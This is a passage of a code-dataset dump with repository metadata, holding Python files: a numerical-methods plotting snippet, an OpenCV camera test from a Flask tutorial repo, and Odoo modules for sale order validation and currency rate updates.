,400)\n fig = plt.figure(1)\n plt.plot(x,f(x))\n plt.plot(x,np.zeros_like(x),'k-')\n plt.plot(np.array(xk_list),f(np.array(xk_list)),'o')\n plt.xlabel('x')\n plt.ylabel('f(x)')\n plt.title('Secant\\'s VS Newton\\'s Method Iteration')\n plt.show()\n \n fig = plt.figure(1)\n plt.plot(xk_list,'o')\n plt.xlabel('k')\n plt.ylabel('$x_k$')\n plt.title('Secant\\'s VS Newton\\'s Method Iteration --- x_k ')\n plt.show()\n\n fig = plt.figure(2)\n plt.plot(np.log10(np.array(residual_list)),'o-')\n plt.xlabel('k')\n plt.ylabel('$\\log_{10}(r_k)$')\n plt.title('Secant\\'s VS Newton\\'s Method Iteration --- convergence rate')\n plt.show()" } ]
6
GalBrandwine/flask_tutorials
https://github.com/GalBrandwine/flask_tutorials
6e03e0a0e3000b7761e5f58803b8a9996dfa72f8
d9c4f72044730bd41936d53b020aeaf860afd486
c48319136008a42107566c469e16a9eb0a97b9d5
refs/heads/master
2020-04-05T21:22:14.040998
2018-11-18T22:28:41
2018-11-18T22:28:41
157,217,584
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5415225028991699, "alphanum_fraction": 0.5570934414863586, "avg_line_length": 26.5238094329834, "blob_id": "df5e0915063ed72696456245857c5bd0c88ecf60", "content_id": "673fd103e831033907ad82f6b5b05a256a16fe2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 68, "num_lines": 21, "path": "/tests/test_videoCamera.py", "repo_name": "GalBrandwine/flask_tutorials", "src_encoding": "UTF-8", "text": "from utils.camera import VideoCamera\nimport cv2\n\n\nclass TestVideoCamera:\n\n def test_get_frame(self):\n \"\"\"Test if camera captures video. \"\"\"\n\n # setup\n camera = VideoCamera()\n print(\"test\")\n # run\n while True:\n frame_returned = camera.get_frame()\n success, frame_decoded = cv2.imdecode(frame_returned, 1)\n cv2.imshow(\"Decoded\", frame_decoded)\n k = cv2.waitKey(0)\n if k == 27: # wait for ESC key to exit\n cv2.destroyAllWindows()\n assert success is True\n" } ]
1
iceship/marcos_community_addons
https://github.com/iceship/marcos_community_addons
22e053c5957a739d770aa0f6e86b0a9773dcf91d
16c9b861e48e938489f9366e4ee143fb788c946e
758ad9b329fe156e05ea9389a7818614796deeed
refs/heads/master
2021-01-24T14:55:46.663384
2016-07-14T07:54:26
2016-07-14T07:54:26
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5742904543876648, "alphanum_fraction": 0.5767946839332581, "avg_line_length": 30.552631378173828, "blob_id": "85f1abc6c4ab404b6613aa15e3ec5a76683b981b", "content_id": "da3745ab078aa5285db67bdb5355d1b6157d8ac0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1199, "license_type": "no_license", "max_line_length": 123, "num_lines": 38, "path": "/ferrua/models/sale.py", "repo_name": "iceship/marcos_community_addons", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, exceptions\nimport re\n\n\nclass Sale(models.Model):\n _inherit = \"sale.order\"\n\n @api.multi\n def action_confirm(self):\n for rec in self:\n mrp_exep = []\n for product in rec.order_line:\n routes_to_built = [route.id for route in product.product_tmpl_id.route_ids if route.id == 6]\n if routes_to_built and not product.product_tmpl_id.bom_count:\n mrp_exep.append(product.product_tmpl_id.name)\n\n if mrp_exep:\n res = \"\"\n for msg in mrp_exep:\n res += u\"{},\\n\".format(msg)\n raise exceptions.ValidationError(u\"Es necesaria la lista de materiales para el producto:\\n {}\".format(res))\n\n return super(Sale, self).action_confirm()\n\n\nclass SaleOrderLine(models.Model):\n _inherit = 'sale.order.line'\n\n position = fields.Integer(u\"Posición\")\n\n @api.onchange(\"position\")\n def onchange_position(self):\n if self.position > 0:\n self.name = u\"[POS: {}]: {}\".format(self.position, self.product_id.name)\n else:\n self.name = self.product_id.name" }, { "alpha_fraction": 0.6641414165496826, "alphanum_fraction": 0.6792929172515869, "avg_line_length": 27.285715103149414, "blob_id": "22f93fe628b16e6e0a152b58c2089ab263e98160", "content_id": "e2eb96880a532586f68c11bd0835b1bab55a9284", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 107, "num_lines": 14, "path": 
"/currency_rates_control/models/res_currency.py", "repo_name": "iceship/marcos_community_addons", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# NOTE: this code write by Alexis de Lattre <[email protected]> on odoo module Currency Rate Date Check\n\n\nfrom openerp import models, fields, api\n\n\n\nclass res_currency_rate(models.Model):\n _inherit = \"res.currency.rate\"\n\n rate = fields.Float('Rate', digits=(12, 12), help='The rate of the currency to the currency of rate 1')\n name = fields.Date('Date', required=True, select=True)\n" }, { "alpha_fraction": 0.5991929769515991, "alphanum_fraction": 0.603227972984314, "avg_line_length": 42.64706039428711, "blob_id": "10e0282fd24dbc09e7208f8b7b57d5a38354a932", "content_id": "68fb1cef1bdc4c57fe63e03f6c08870d827918c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 137, "num_lines": 34, "path": "/currency_rates_control/wizard/rate_update_wizard.py", "repo_name": "iceship/marcos_community_addons", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, exceptions\n\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass RateUpdateWizard(models.TransientModel):\n _name = \"update.rate.wizard\"\n\n update_method = fields.Selection([('server','Desde internet'),('manual','Introducir tasa manualmente')],\n string=u\"Metodo de actualizaciónn de tasa\", default=\"server\")\n name = fields.Date(\"Fecha\", required=True)\n rate = fields.Float(\"Monto\", requiered=True)\n currency_id = fields.Many2one(\"res.currency\", string=\"Moneda\", readonly=True)\n\n @api.multi\n def update_rate(self):\n if self.update_method == \"manual\":\n if self.rate < 1:\n raise exceptions.UserError(\"El valor de la tasa debe de ser mayor que 0\")\n rate = self.env[\"res.currency.rate\"].search([('name','=',self.name),('currency_id','=',self.currency_id.id)])\n if 
rate:\n return rate.write({\"rate\": 1/self.rate})\n else:\n return self.env[\"res.currency.rate\"].create({\"name\": self.name, \"rate\": 1/self.rate, \"currency_id\": self.currency_id.id})\n else:\n try:\n self.env[\"currency.rate.update.service\"]._run_currency_update()\n except Exception as e:\n _logger.error(\"{}\".format(e))\n raise exceptions.ValidationError(\"Ocurrio un error al intentar actualizar la tasa desde el servidor de internet.\")\n\n\n\n" } ]
3